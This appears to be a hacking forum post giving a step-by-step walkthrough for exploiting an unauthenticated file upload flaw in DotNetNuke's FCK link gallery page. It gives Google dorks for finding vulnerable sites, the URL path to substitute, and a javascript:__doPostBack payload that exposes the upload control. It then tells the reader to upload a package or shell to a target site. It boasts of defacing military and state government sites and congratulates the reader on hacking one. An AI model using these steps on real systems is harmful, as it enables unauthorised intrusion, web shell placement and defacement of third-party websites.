Portal hacking
This BUG Find by Iranian Researchers
DNN(DotNetNuke) Gallery All Version Remote File Upload without Authentication
Bug Found by Alireza Afzali From ISCN Team
Date of finding bug : 2008/05/5
Over 10 military website and 20 state of United State of america Defaced by this bug Tongue
Find DNN path then go to this file
----------------------------------------------------------------------------------------
Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Select : File ( A File On Your Site )
after Loading then Put this Code instead URL
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
now you see Browse
select root folder and your file will upload to
site/dnn path/Portals/0
Code:
Note:you can only upload *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
by defualt but admin may change this and you will have a Shell
Here is the way of hacking site by portal.....
Step 1 :
Code:
Google
Step 2:- Now enter this
Code:
inurl:/tabid/36/language/en-US/Default.aspx
Code:
inurl:"portals/0/"
this is a dork to find the Portal Vulnerable sites, use it wisely
Step 3:- U will find many sites, Select the site which you are comfortable with.
Step 4:- For example take this site.
Step 5:- Now replace
Code:
/Home/tabid/36/Language/en-US/Default.aspx
with this
Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6:- You will get a Link Gallary page.So far so good!
Step 7:- Dont do anything for now, FINAL stage APPROACHING.
Step 8:-Now replace the URL in the address bar with a Simple Script
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 9:-You will Find the Browse and Upload Option
Step 10:-Upload your package
Step 11:-Go to http://www.site.com/potals0/YOUR.PAGE....
Congrats You just hacked a site.. =))
